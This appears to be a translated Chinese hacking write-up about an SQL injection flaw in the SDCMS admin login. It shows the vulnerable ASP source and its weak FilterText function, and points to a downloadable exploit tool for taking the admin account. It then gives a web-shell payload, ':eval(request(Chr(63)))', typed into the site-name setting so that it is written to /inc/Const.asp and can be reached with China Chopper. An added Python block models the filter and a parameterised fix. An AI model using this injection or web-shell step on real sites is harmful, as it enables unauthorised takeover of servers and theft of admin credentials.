Author: T00LS 鬼哥

Vulnerable file: <admin directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        'username goes straight into the SQL string; FilterText mode 1 only stripped whitespace
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub

We can see that username is filtered through FilterText. Let's look at the code of FilterText:

Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            'mode 1: only whitespace control characters are removed
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            'mode 2: control characters and all ASCII punctuation are removed
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return; chr(13)&chr(10) is the CR+LF combination
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            'default mode: HTML-entity encode the characters that matter in markup
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'break the CSS keyword "expression" with a soft hyphen (Chr(173)) so it is not parsed
        t0=Replace(t0,"expression","e"&Chr(173)&"xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function

See that? When the second parameter is 1, the only filtering applied is:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

Spaces, carriage returns and line feeds are removed; single quotes and every other SQL metacharacter pass through untouched into the string-concatenated query.
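To make the difference concrete, here is an added Python model (not SDCMS code; the function names, the sqlite3 stand-in for Sd_Admin and its schema are assumptions). It reproduces FilterText modes 1 and 2 from the character lists above, shows that a mode-1 filtered username is spliced into the SQL string with its quotes intact, and contrasts a parameterised query that treats the same input purely as data:

```python
import hashlib
import sqlite3

# Constructed model of SDCMS FilterText (character sets copied from the page).
# Mode "1" strips only whitespace controls; mode "2" strips the full
# punctuation list; any other mode is treated as a no-op in this model.
MODE1_CHARS = [chr(c) for c in (32, 13, 10)]
MODE2_CHARS = [chr(c) for c in (8, 9, 10, 11, 12, 13, 22)] \
    + [chr(c) for c in range(32, 48)] + [chr(c) for c in range(58, 65)] \
    + [chr(c) for c in range(91, 97)] + [chr(c) for c in range(123, 127)]

def filter_text(t0: str, t1: str) -> str:
    if not t0:
        return ""
    t0 = t0.strip()
    for ch in {"1": MODE1_CHARS, "2": MODE2_CHARS}.get(t1, []):
        t0 = t0.replace(ch, "")
    return t0

def build_login_sql(username: str, password: str) -> str:
    """The query as index.asp concatenates it after FilterText(..., 1)."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()  # SDCMS stores md5
    return ("Select Id From Sd_Admin Where Sdcms_name='" + filter_text(username, "1")
            + "' And Sdcms_Pwd='" + pwd_hash + "'")

def breaks_literal(username: str) -> bool:
    """Detection check: mode-1 filtering leaves a quote that closes the literal."""
    return "'" in filter_text(username, "1")

def login_param(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: placeholders keep the username as data, whatever it holds."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT Id FROM Sd_Admin WHERE Sdcms_name=? AND Sdcms_Pwd=?",
        (filter_text(username, "1"), pwd_hash)).fetchone()
    return row[0] if row else None

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Sd_Admin table (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Sd_Admin(Id INTEGER, Sdcms_name TEXT, Sdcms_Pwd TEXT)")
    conn.execute("INSERT INTO Sd_Admin VALUES (1, 'admin', ?)",
                 (hashlib.md5(b"s3cret").hexdigest(),))
    return conn
```

With the parameterised version a username such as `admin'` simply fails to match, whereas `build_login_sql` shows the same quote landing inside the SQL text.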
The vulnerability lets you obtain the admin account and password directly. The default SDCMS admin path is /admin/; if the webmaster changed the admin path, you will have to find it yourself!

EXP tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the captcha into the tool and click OK.

See, we go straight into the admin management interface, heh!

Straight into the backend like that....

SDCMS privilege escalation:

Method 1: visit /<admin directory>/sdcms_set.asp and append “:eval(request(Chr(63)))’ after "Site name:" to write a one-liner shell directly. It is written to /inc/Const.asp; the one-liner connection password is ?

OK, now connect with 菜刀!